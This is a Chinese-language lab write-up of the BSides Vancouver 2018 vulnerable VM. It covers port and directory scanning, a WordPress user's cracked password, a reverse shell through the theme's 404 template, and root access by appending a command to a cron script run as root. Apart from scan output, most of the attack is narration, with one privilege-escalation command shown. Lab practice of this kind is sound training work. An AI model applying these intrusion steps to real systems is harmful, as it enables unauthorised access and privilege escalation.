bsidesvancouver2018
先上首頁：

p1

然后nmap:

# Nmap 7.40 scan initiated Sun Jan 13 22:32:56 2019 as: nmap -p- -A -sV -oN test.xml 192.168.110.139
Nmap scan report for 192.168.110.139
Host is up (0.0010s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 65534    65534        4096 Mar 03  2018 public
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
|   2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_  256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.02 ms 192.168.110.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 13 22:33:26 2019 -- 1 IP address (1 host up) scanned in 30.91 seconds

dirb結(jié)果如下：

+ http://192.168.110.139/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.110.139/index (CODE:200|SIZE:177)
+ http://192.168.110.139/robots.txt (CODE:200|SIZE:43)//后臺存在wordpress
+ http://192.168.110.139/server-status (CODE:403|SIZE:296)

ftp匿名登陸之后好像沒啥用。。。直接上wpscan

wpscan -e u -u http://192.168.110.139/backup_wordpress/

結(jié)果如下：

p2

找到用戶名但是爆破以后沒發(fā)現(xiàn)弱口令。
然后感覺沒啥思路了，應(yīng)該得有弱密碼才對，這時(shí)候只能看看walkthrough了。。。
發(fā)現(xiàn)別人也是爆破的，但是他爆的到弱口令。。。。我去。。。
john的密碼是enigma.
然后就是直接上404模板反彈shell了。。
這里反彈shell有是一番折騰，不說了。。。記著靠參數(shù)來激活404，反彈shell不成功就直接上reverse-php就行了。。。
反彈以后一波搜索，占了wp-config.php，發(fā)現(xiàn)里面有john連接數(shù)據(jù)庫賬號密碼，但是嘗試了以后登不了。。。
然后找了內(nèi)核漏洞，發(fā)現(xiàn)沒法執(zhí)行dirty.....
然后最后看了walkthrough之后發(fā)現(xiàn)也是發(fā)現(xiàn)了一個(gè)uuid提權(quán)漏洞，怎么做呢，就是發(fā)現(xiàn)crontab定期執(zhí)行文件，而且發(fā)現(xiàn)該文件具有root權(quán)限執(zhí)行，所以直接使用echo命令寫進(jìn)去

echo  "cat /root/flag.txt > /tmp/flag1.txt" >> /usr/local/bin/cleanup

p3

然后就是介紹一個(gè)wp上傳腳本的利用

p4

要等好久，10分鐘左右，但是可以直接反彈nc的shell，挺方便的，還可以插入beef。

思路總結(jié)：
1.nmap和dirb直接收集信息，發(fā)現(xiàn)wordpress后臺
2.直接插入404反彈shell
3.使用suid提權(quán)，直接借crontab查看flag.txt